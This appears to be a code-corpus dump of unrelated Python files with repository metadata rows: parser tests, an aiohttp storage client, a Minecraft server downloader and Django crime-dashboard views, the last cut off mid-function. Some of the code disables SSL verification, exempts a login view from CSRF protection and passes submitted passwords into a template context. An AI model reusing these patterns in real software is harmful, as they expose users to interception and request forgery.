result = args.parse(None, "not a number")
assert not bool(result)
def test_one_invalid_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
result = args.parse(None, "-3")
assert not bool(result)
def test_one_min_limited_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = -5
result = args.parse(None, "-3")
assert bool(result)
assert result.number == -3
def test_one_min_limited_incorrect_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = -5
result = args.parse(None, "-6")
assert not bool(result)
def test_one_no_min_limit_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.min_limit = None
result = args.parse(None, "-120")
assert bool(result)
assert result.number == -120
def test_one_max_limited_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = 5
result = args.parse(None, "4")
assert bool(result)
assert result.number == 4
def test_one_max_limited_incorrect_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = 5
result = args.parse(None, "6")
assert not bool(result)
def test_one_no_min_limit_correct_number():
"""Parse a limited number."""
args = CommandArgs()
number = args.add_argument("number")
number.max_limit = None
result = args.parse(None, "120")
assert bool(result)
assert result.number == 120
def test_two_mandatory_numbers_valid():
"""Parse a command with two numbers separated by space."""
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("number", dest="second")
result = args.parse(None, "5 2")
assert bool(result)
assert result.first == 5
assert result.second == 2
def test_two_mandatory_numbers_error():
"""Parse a command with one number, but expect two."""
# Parse one number but expect two.
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("number", dest="second")
result = args.parse(None, "5")
assert not bool(result)
# Parse three numbers but expect two.
result = args.parse(None, "1 2 3")
assert not bool(result)
def test_two_mandatory_numbers_separated_by_symbol_valid():
"""Parse a command with two numbers separated by a symbol."""
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("symbols", "|")
args.add_argument("number", dest="second")
result = args.parse(None, "5|2")
assert bool(result)
assert result.first == 5
assert result.second == 2
# Put spaces before/after the separator.
result = args.parse(None, "5 | 2")
assert bool(result)
assert result.first == 5
assert result.second == 2
def test_two_mandatory_numbers_separated_by_symbols_error():
"""Parse a command with one number, but expect two."""
# Parse one number but expect two.
args = CommandArgs()
args.add_argument("number", dest="first")
args.add_argument("symbols", "|")
args.add_argument("number", dest="second")
result = args.parse(None, "5")
assert not bool(result)
# Parse three numbers but expect two.
result = args.parse(None, "1|2|3")
assert not bool(result)
| 28.363636 | 65 | 0.666667 | 546 | 4,056 | 4.791209 | 0.106227 | 0.050841 | 0.108945 | 0.136468 | 0.943043 | 0.922401 | 0.883028 | 0.842125 | 0.842125 | 0.809251 | 0 | 0.014556 | 0.203895 | 4,056 | 142 | 66 | 28.56338 | 0.795602 | 0.160503 | 0 | 0.715789 | 0 | 0 | 0.064168 | 0 | 0 | 0 | 0 | 0 | 0.284211 | 1 | 0.136842 | false | 0 | 0.010526 | 0 | 0.147368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d854565a6717e3beae4a41442d6efc9ffac8247f | 10,116 | py | Python | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | null | null | null | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | 1 | 2022-03-14T09:40:15.000Z | 2022-03-14T09:40:15.000Z | youwol_utils/clients/treedb/treedb.py | youwol/py-youwol | 85a8877e302c9da1aea168bf1d964d19036c1134 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Dict
import aiohttp
from youwol_utils.clients.utils import raise_exception_from_response
@dataclass(frozen=True)
class TreeDbClient:
url_base: str
headers: Dict[str, str] = field(default_factory=lambda: {})
connector = aiohttp.TCPConnector(verify_ssl=False)
async def get_drives(self, group_id: str, **kwargs):
url = f"{self.url_base}/groups/{group_id}/drives"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def get_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def create_drive(self, group_id: str, body, **kwargs):
url = f"{self.url_base}/groups/{group_id}/drives"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def update_drive(self, drive_id: str, body, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
drives = await resp.json()
return drives
await raise_exception_from_response(resp, **kwargs)
async def delete_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def create_folder(self, parent_folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{parent_folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def update_folder(self, folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def move(self, body, **kwargs):
url = f"{self.url_base}/move"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def remove_folder(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def remove_item(self, item_id: str, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
resp = await resp.json()
return resp
await raise_exception_from_response(resp, **kwargs)
async def get_item(self, item_id: str, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_path(self, item_id, **kwargs):
url = f"{self.url_base}/items/{item_id}/path"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_entity(self, entity_id: str, include_drives: bool = True, include_folders: bool = True,
include_items: bool = True, **kwargs):
url = f"{self.url_base}/entities/{entity_id}"
params = {"include-drives": int(include_drives),
"include-folders": int(include_folders),
"include-items": int(include_items)}
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, params=params, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_items_from_related_id(self, related_id: str, **kwargs):
url = f"{self.url_base}/items/from-related/{related_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def update_item(self, item_id: str, body, **kwargs):
url = f"{self.url_base}/items/{item_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_folder(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_children(self, folder_id: str, **kwargs):
url = f"{self.url_base}/folders/{folder_id}/children"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def get_deleted(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}/deleted"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.get(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def purge_drive(self, drive_id: str, **kwargs):
url = f"{self.url_base}/drives/{drive_id}/purge"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.delete(url=url, **kwargs) as resp:
if resp.status == 200:
items = await resp.json()
return items
await raise_exception_from_response(resp, **kwargs)
async def create_item(self, folder_id: str, body, **kwargs):
url = f"{self.url_base}/folders/{folder_id}/items"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.put(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
async def get_records(self, body, **kwargs):
url = f"{self.url_base}/records"
async with aiohttp.ClientSession(headers=self.headers) as session:
async with await session.post(url=url, json=body, **kwargs) as resp:
if resp.status == 200:
folder = await resp.json()
return folder
await raise_exception_from_response(resp, **kwargs)
| 40.464 | 105 | 0.59134 | 1,212 | 10,116 | 4.80363 | 0.063531 | 0.064926 | 0.068018 | 0.098248 | 0.887324 | 0.881828 | 0.878221 | 0.878221 | 0.8674 | 0.851941 | 0 | 0.00899 | 0.307236 | 10,116 | 249 | 106 | 40.626506 | 0.821775 | 0 | 0 | 0.751381 | 0 | 0 | 0.077896 | 0.071768 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022099 | 0 | 0.160221 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d86a1a647aae9fb70ee365860aac9ed32f6379a8 | 657 | py | Python | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | null | null | null | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | 2 | 2017-09-05T11:12:05.000Z | 2017-09-07T19:23:15.000Z | pyss/simpleobject.py | vpv11110000/pyss | bc2226e2e66e0b551a09ae6ab6835b0bb6c7f32b | [
"MIT"
] | null | null | null | # #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Очень простой объект
"""
# pylint: disable=line-too-long
class SimpleObject(object):
"""Простой объект модели
Args:
value - значение
"""
def __init__(self, value=None):
self.value = value
def getValue(self):
return self.value
def setValue(self, value):
self.value = value
def addValue(self, value):
self.value = self.value + value
def decValue(self, value):
self.value = self.value - value
def __str__(self):
return "%s" % str(self.value)
if __name__ == '__main__':
pass
| 16.846154 | 39 | 0.557078 | 74 | 657 | 4.72973 | 0.486486 | 0.308571 | 0.185714 | 0.257143 | 0.274286 | 0.274286 | 0.2 | 0.2 | 0 | 0 | 0 | 0.002217 | 0.313546 | 657 | 38 | 40 | 17.289474 | 0.773836 | 0.21309 | 0 | 0.133333 | 0 | 0 | 0.020534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.066667 | 0 | 0.133333 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
d86cc563e95712c9e3dded8c0557dec3bff1f680 | 4,928 | py | Python | versions/default.py | Advik-B/MC-Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | 1 | 2021-08-15T11:23:09.000Z | 2021-08-15T11:23:09.000Z | versions/default.py | Advik-B/Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | null | null | null | versions/default.py | Advik-B/Server-Installer | a52ed35eac828f220044b5a751c5f8ecf4d82f42 | [
"MIT"
] | null | null | null | import os
try:
import subprocess
import requests
from bs4 import BeautifulSoup
from zipfile import ZipFile
except ModuleNotFoundError:
os.system('python -m pip install -r requirements.txt')
import subprocess
import requests
from bs4 import BeautifulSoup
from zipfile import ZipFile
class Server():
"""
forge and fabric require you use the `zip_download` command
"""
def download(link:str , folder_path=None) -> None:
"""
forge and fabric require you use the `zip_download` command
"""
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
MediaUrl = link
url = MediaUrl
req = requests.get(url, headers)
soup = BeautifulSoup(req.content, 'html.parser')
url = soup.find("a", class_="popsok").get('href')
r = requests.get(url , stream=True)
if folder_path != None:
file_path = folder_path.__add__('/server.jar').replace('\\' , '/')
else:
file_path = ('./server.jar')
print ("Server-Type : " + soup.find("div", class_="filename").get_text())
print (soup.find("ul", class_="details").get_text())
print('Downloading, please wait.')
with open(file_path,'wb') as f:
for chunk in r.iter_content(chunk_size=1000):
if chunk:
f.write(chunk)
print()
print('Download completed!')
def runserver(server_folder=None , run_command=None , server_file_name=None) -> None:
cwd = os.getcwd()
path = server_folder
eula = str(os.path.join(path , 'eula.txt')).replace('\\' , '/')
global eula_content
if server_folder == None:
if server_file_name == None:
server_file_name = 'server.jar'
if run_command == None:
run_command = 'java -Xmx1024M -Xms1024M -jar'
eula_content = "#By changing the setting below to TRUE you are indicating your agreement to our EULA (https://account.mojang.com/documents/minecraft_eula).\n#Sun Aug 15 09:55:51 IST 2021\neula=true"
with open(eula, mode='w+') as f:
f.write(eula_content)
subprocess.Popen(f'{run_command} {server_file_name} nogui' , cwd=(os.getcwd()))
elif server_folder != None:
if server_file_name == None:
server_file_name = 'server.jar'
if run_command == None:
run_command = 'java -Xmx1024M -Xms1024M -jar'
eula_content = "#By changing the setting below to TRUE you are indicating your agreement to our EULA (https://account.mojang.com/documents/minecraft_eula).\n#Sun Aug 15 09:55:51 IST 2021\neula=true"
with open(eula, mode='w+') as f:
f.write(eula_content)
subprocess.Popen(f'{run_command} {server_file_name} nogui' , cwd=path)
def zip_download(link:str , folder_path=None) -> None:
"""
forge and fabric require you use the `zip_download` command
"""
headers = {
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Max-Age': '3600',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
MediaUrl = link
url = MediaUrl
req = requests.get(url, headers)
soup = BeautifulSoup(req.content, 'html.parser')
url = soup.find("a", class_="popsok").get('href')
r = requests.get(url ,stream=True)
if folder_path != None:
file_path = folder_path.__add__('/server.zip').replace('\\' , '/')
else:
file_path = ('./server.zip')
print ("Server-Type : " + soup.find("div", class_="filename").get_text())
print (soup.find("ul", class_="details").get_text())
print('Downloading, please wait.')
with open(file_path,'wb') as f:
for chunk in r.iter_content(chunk_size=1000):
if chunk:
f.write(chunk)
print()
print('Download completed!')
# importing required modules
from zipfile import ZipFile
# specifying the zip file name
# opening the zip file in READ mode
with ZipFile(file_path, 'r') as zip:
# printing all the contents of the zip file
# extracting all the files
zip.extractall(folder_path)
os.remove(file_path) | 35.710145 | 210 | 0.572443 | 591 | 4,928 | 4.646362 | 0.270728 | 0.037873 | 0.035688 | 0.02622 | 0.822287 | 0.804079 | 0.804079 | 0.804079 | 0.804079 | 0.804079 | 0 | 0.029746 | 0.30418 | 4,928 | 138 | 211 | 35.710145 | 0.77107 | 0.068385 | 0 | 0.734043 | 0 | 0.042553 | 0.277753 | 0.046625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031915 | false | 0 | 0.106383 | 0 | 0.148936 | 0.106383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2b5f8f360860d3bcb5cf7f77835c9a45dc803b39 | 162 | py | Python | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | swa/web/admin.py | swones/swa | f33d51a58841935af10409f97ba63af148e9635f | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Language, Snippet, Tag
admin.site.register(Tag)
admin.site.register(Snippet)
admin.site.register(Language)
| 20.25 | 42 | 0.808642 | 23 | 162 | 5.695652 | 0.478261 | 0.206107 | 0.389313 | 0.305344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092593 | 162 | 7 | 43 | 23.142857 | 0.891156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
2b7446ebe0c69044c9d6f29292cc90ed50de756b | 87,578 | py | Python | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | 1 | 2021-06-29T23:15:05.000Z | 2021-06-29T23:15:05.000Z | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | null | null | null | Dashboard with Django/app/views.py | reddyprasade/Data-Analysis-with-Python- | 2440e23486856eea5556c8262467b3a618032bc2 | [
"MIT"
] | 1 | 2021-12-20T10:04:53.000Z | 2021-12-20T10:04:53.000Z | from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.contrib.auth.forms import UserCreationForm
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django.shortcuts import redirect
import matplotlib
matplotlib.use('Agg')
import numpy as np
from django.views.generic import TemplateView
import pandas as pd
import os
import seaborn as sns
from app.models import crimes_against_women,murder
import plotly
import plotly.offline as opy
import plotly.graph_objs as go
import pickle
# Create your views here.
from django import forms
from django.utils import timezone
from app.forms import caw
from app.forms import mv
from app.forms import sf
def sss(request):
if request.method == "POST":
form = sf(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
day = request.POST.get('Day')
place = request.POST.get('location')
filename = 'prediction.sav'
module_dir = os.path.dirname(__file__)
file_path = os.path.join(module_dir, filename)
model = pickle.load(open(file_path, 'rb'))
p = [0] * 17
if day == 'Friday':
p[0]= 1
if day == 'Monday':
p[1]= 1
if day == 'Saturday':
p[2]= 1
if day == 'Sunday':
p[3]= 1
if day == 'Thursday':
p[4]= 1
if day == 'Tuesday':
p[5]= 1
if day == 'Wednesday':
p[6]= 1
if place == 'BAYVIEW':
p[7] = 1
if place == 'CENTRAL':
p[8] = 1
if place == 'INGLESIDE':
p[9] = 1
if place == 'MISSION':
p[10] = 1
if place == 'NORTHERN':
p[11] = 1
if place == 'PARK':
p[12] = 1
if place == 'RICHMOND':
p[13] = 1
if place == 'SOUTHERN':
p[14] = 1
if place == 'TARAVAL':
p[15] = 1
if place == 'TENDERLOIN':
p[16] = 1
array = model.predict_proba(p)
crimes = ['ARSON', 'ASSAULT', 'BAD CHECKS', 'BRIBERY', 'BURGLARY',
'DISORDERLY CONDUCT', 'DRIVING UNDER THE INFLUENCE',
'DRUG/NARCOTIC', 'DRUNKENNESS', 'EMBEZZLEMENT', 'EXTORTION',
'FAMILY OFFENSES', 'FORGERY/COUNTERFEITING', 'FRAUD', 'GAMBLING',
'KIDNAPPING', 'LARCENY/THEFT', 'LIQUOR LAWS', 'LOITERING',
'MISSING PERSON', 'NON-CRIMINAL', 'OTHER OFFENSES',
'PORNOGRAPHY/OBSCENE MAT', 'PROSTITUTION', 'RECOVERED VEHICLE',
'ROBBERY', 'RUNAWAY', 'SECONDARY CODES', 'SEX OFFENSES FORCIBLE',
'SEX OFFENSES NON FORCIBLE', 'STOLEN PROPERTY', 'SUICIDE',
'SUSPICIOUS OCC', 'TREA', 'TRESPASS', 'VANDALISM', 'VEHICLE THEFT',
'WARRANTS', 'WEAPON LAWS']
thevalues = {
'day': day,
'location': place,
'array':array,
'crimes':crimes,
'crimes00':crimes[0],
'crimes01':crimes[1],
'crimes02':crimes[2],
'crimes03':crimes[3],
'crimes04':crimes[4],
'crimes05':crimes[5],
'crimes06':crimes[6],
'crimes07':crimes[7],
'crimes08':crimes[8],
'crimes09':crimes[9],
'crimes10':crimes[10],
'crimes11':crimes[11],
'crimes12':crimes[12],
'crimes13':crimes[13],
'crimes14':crimes[14],
'crimes15':crimes[15],
'crimes16':crimes[16],
'crimes17':crimes[17],
'crimes18':crimes[18],
'crimes19':crimes[19],
'crimes20':crimes[20],
'crimes21':crimes[21],
'crimes22':crimes[22],
'crimes23':crimes[23],
'crimes24':crimes[24],
'crimes25':crimes[25],
'crimes26':crimes[26],
'crimes27':crimes[27],
'crimes28':crimes[28],
'crimes29':crimes[29],
'crimes30':crimes[30],
'crimes31':crimes[31],
'crimes32':crimes[32],
'crimes33':crimes[33],
'crimes34':crimes[34],
'crimes35':crimes[35],
'crimes36':crimes[36],
'crimes37':crimes[37],
'crimes38':crimes[38],
'array00' :array[0][0] * 100,
'array01' :array[0][1] * 100,
'array02' :array[0][2] * 100,
'array03' :array[0][3] * 100,
'array04' :array[0][4] * 100,
'array05' :array[0][5] * 100,
'array06' :array[0][6] * 100,
'array07' :array[0][7] * 100,
'array08' :array[0][8] * 100,
'array09' :array[0][9] * 100,
'array10' :array[0][10] * 100,
'array11' :array[0][11] * 100,
'array12' :array[0][12] * 100,
'array13' :array[0][13] * 100,
'array14' :array[0][14] * 100,
'array15' :array[0][15] * 100,
'array16' :array[0][16] * 100,
'array17' :array[0][17] * 100,
'array18' :array[0][18] * 100,
'array19' :array[0][19] * 100,
'array20' :array[0][20] * 100,
'array21' :array[0][21] * 100,
'array22' :array[0][22] * 100,
'array23' :array[0][23] * 100,
'array24' :array[0][24] * 100,
'array25' :array[0][25] * 100,
'array26' :array[0][26] * 100,
'array27' :array[0][27] * 100,
'array28' :array[0][28] * 100,
'array29' :array[0][29] * 100,
'array30' :array[0][30] * 100,
'array31' :array[0][31] * 100,
'array32' :array[0][32] * 100,
'array33' :array[0][33] * 100,
'array34' :array[0][34] * 100,
'array35' :array[0][35] * 100,
'array36' :array[0][36] * 100,
'array37' :array[0][37] * 100,
'array38' :array[0][38] * 100,
}
template = loader.get_template('ML/ml.html')
return HttpResponse(template.render(thevalues, request))
else:
form = sf()
return render(request, "sf.html", {'form': form})
def add(request):
if request.method == "POST":
form = caw(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
template = loader.get_template('index.html')
return HttpResponse(template.render())
else:
template = loader.get_template('wrong/wrong-caw.html')
return HttpResponse(template.render())
else:
form = caw()
return render(request, "caw.html", {'form': form})
def addmv(request):
if request.method == "POST":
form = mv(request.POST)
if form.is_valid():
model_instance = form.save(commit=False)
model_instance.timestamp = timezone.now()
model_instance.save()
template = loader.get_template('index.html')
return HttpResponse(template.render())
else:
template = loader.get_template('wrong/wrong-murder.html')
return HttpResponse(template.render())
else:
form = mv()
return render(request, "mv.html", {'form': form})
@csrf_exempt
def login(request):
#if post request came
if request.method == 'POST':
#getting values from post
name = request.POST.get('name')
passwd = request.POST.get('passwd')
#adding the values in a context variable
context = {
'name': name,
'passwd': passwd
}
user = authenticate(username=name, password=passwd)
if user is not None:
template = loader.get_template('index.html')
return HttpResponse(template.render())
else:
template = loader.get_template('portfolio-page.html')
#returing the template
return HttpResponse(template.render(context, request))
else:
#if post request is not true
#returing the form template
template = loader.get_template('login.html')
return HttpResponse(template.render())
def redi(request):
return redirect('/login')
def register(request):
if request.method =='POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('/index#')
else:
template = loader.get_template('wrong/wrong-register.html')
return HttpResponse(template.render())
else:
form = UserCreationForm()
args = {'form': form}
return render(request, 'reg.html', args)
def page1(request):
template = loader.get_template('pages/page1.html')
return HttpResponse(template.render())
def wrtstate(request):
template = loader.get_template('womenn.html')
return HttpResponse(template.render())
def murders(request):
template = loader.get_template('wrtstate.html')
return HttpResponse(template.render())
from fusioncharts import FusionCharts
def chart2001(request):
year = '2001'
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2001, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2001, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'women/2001.html', {'output': column2D.render()}, {'year':year})
def chart2002(request):
dataSource = {}
dataSource['chart'] = {
"caption": "Click on each State for a Subgroup Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in crimes_against_women.objects.all().filter(Year = 2002, Subgroup="Total Rape Victims"):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Rape_Cases_Reported
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the subgroups of the Crime in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in crimes_against_women.objects.all().filter(Year = 2002, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Subgroup
arrDara['value'] = key.Rape_Cases_Reported
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
